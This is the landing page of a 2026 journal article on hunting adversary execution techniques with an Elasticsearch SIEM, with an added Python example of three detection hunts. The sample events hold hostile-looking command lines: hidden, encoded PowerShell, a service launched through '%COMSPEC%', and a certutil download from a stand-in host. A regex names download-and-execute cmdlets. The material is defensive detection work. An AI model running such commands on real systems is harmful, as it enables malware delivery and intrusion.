Threat hunting the silent killers - behavior-based execution attacks

https://doi.org/10.55214/2576-8484.v10i1.11606

Authors

  • Akashdeep Bhardwaj, Centre for Cybersecurity, School of Computer Science, UPES, Dehradun, India.

Execution refers to techniques by which adversary-controlled code or scripts are run on a local or remote system. Code-execution techniques are typically chained with techniques from other tactics to accomplish broader objectives such as data theft or reconnaissance of the network infrastructure; for example, an adversary may use a remote access tool to run a PowerShell script that performs remote system discovery. In this research, the authors focus on three distinct threat hunting methods for execution techniques. The first hunt targets the command and scripting interpreter, where adversaries execute commands, scripts, or binaries through a variety of interfaces and languages. The second hunt targets execution through system services, where adversaries abuse the Windows Service Control Manager to run malicious payloads and commands. The third hunt targets user execution, where attackers lure a victim into opening a malicious file in order to obtain execution. The authors deployed an Elasticsearch Security Information and Event Management (SIEM) system to ingest logs gathered from various sources and ran the threat hunts as searches in Kibana, using Lucene syntax and the Elasticsearch query domain-specific language (DSL).
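The three hunts summarised in the abstract can be expressed as filters over Windows process-creation and service-installation events. The following is an added example written for this page, not code from the paper: it runs the three hunts over a handful of constructed Sysmon/Security-log style events and also emits one equivalent Elasticsearch query DSL body. The field names (`image`, `parent_image`, `command_line`, `image_path`), the ECS names used in the DSL, the interpreter and Office process lists, the "suspicious argument" regex, and the trusted service directories are all assumptions to be tuned per environment.

```python
"""Added example: three execution-technique hunts over constructed Windows events.

Hunt 1 - command and scripting interpreter: a script host started with
         arguments typical of hidden or encoded execution (Sysmon 1 / Security 4688).
Hunt 2 - system services: a service installed whose ImagePath is a script host or
         lives outside trusted directories (System 7045 / Security 4697).
Hunt 3 - user execution: a process whose parent is an Office application.
Field names and tuning lists below are assumptions, not the paper's configuration.
"""
import re

SCRIPT_INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                       "cscript.exe", "mshta.exe", "rundll32.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
TRUSTED_SERVICE_DIRS = ("c:\\windows\\", "c:\\program files")
# Switches/cmdlets that rarely appear in interactive admin use (assumption: tune per estate).
SUSPICIOUS_ARGS = re.compile(
    r"-(e|enc|encodedcommand)\b|-w(indowstyle)? hidden|-nop\b|bypass|\biex\b|downloadstring|frombase64string",
    re.IGNORECASE,
)

# Constructed sample events; the base64 payload is a placeholder string.
SAMPLE_EVENTS = [
    {"id": 1, "event_id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"id": 2, "event_id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell.exe -NoProfile -Command Get-Process"},
    {"id": 3, "event_id": 7045, "service_name": "BITS",
     "image_path": r"C:\Windows\System32\svchost.exe -k netsvcs"},
    {"id": 4, "event_id": 7045, "service_name": "WinUpd",
     "image_path": r"%COMSPEC% /c powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"id": 5, "event_id": 4697, "service_name": "Updater",
     "image_path": r"C:\Users\Public\update.exe"},
    {"id": 6, "event_id": 4688, "image": r"C:\Windows\System32\cmd.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "cmd.exe /c certutil -urlcache -split -f http://example.invalid/a.txt a.txt"},
]


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def hunt_script_interpreter(events):
    """Hunt 1: script host process with suspicious command-line switches."""
    return [e for e in events
            if e.get("event_id") in (1, 4688)
            and basename(e.get("image", "")) in SCRIPT_INTERPRETERS
            and SUSPICIOUS_ARGS.search(e.get("command_line", ""))]


def hunt_service_execution(events):
    """Hunt 2: new service whose binary is a script host or outside trusted paths."""
    hits = []
    for e in events:
        if e.get("event_id") not in (7045, 4697):
            continue
        path = e.get("image_path", "").lower()
        exe = path.split()[0].strip('"') if path else ""  # drop service arguments
        uses_interpreter = "%comspec%" in path or any(i in path for i in SCRIPT_INTERPRETERS)
        untrusted_dir = not exe.startswith(TRUSTED_SERVICE_DIRS)
        if uses_interpreter or untrusted_dir:
            hits.append(e)
    return hits


def hunt_user_execution(events):
    """Hunt 3: any child process spawned by an Office application."""
    return [e for e in events
            if e.get("event_id") in (1, 4688)
            and basename(e.get("parent_image", "")) in OFFICE_APPS]


def run_all_hunts(events):
    """Return {hunt name: sorted ids of matching events} for the three hunts."""
    return {
        "command_and_scripting_interpreter": sorted(e["id"] for e in hunt_script_interpreter(events)),
        "system_services": sorted(e["id"] for e in hunt_service_execution(events)),
        "user_execution": sorted(e["id"] for e in hunt_user_execution(events)),
    }


def user_execution_query_dsl():
    """Elasticsearch query DSL for hunt 3, assuming ECS-normalised fields."""
    return {"query": {"bool": {"filter": [
        {"terms": {"event.code": ["1", "4688"]}},
        {"terms": {"process.parent.name": sorted(OFFICE_APPS)}},
    ]}}}


if __name__ == "__main__":
    for hunt, ids in run_all_hunts(SAMPLE_EVENTS).items():
        print(f"{hunt}: events {ids}")
```

Event 6 shows why the hunts are run side by side: the Office-spawned `cmd.exe` does not match the interpreter hunt's argument regex, so only the user-execution hunt surfaces it. A service ImagePath that starts with `%COMSPEC%` (event 4) is flagged on the interpreter check regardless of path, which is the pattern the Service Control Manager hunt is looking for.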

How to Cite

Bhardwaj, A. (2026). Threat hunting the silent killers - behavior-based execution attacks. Edelweiss Applied Science and Technology, 10(1), 208–231. https://doi.org/10.55214/2576-8484.v10i1.11606


Section

Articles

Published

2026-01-01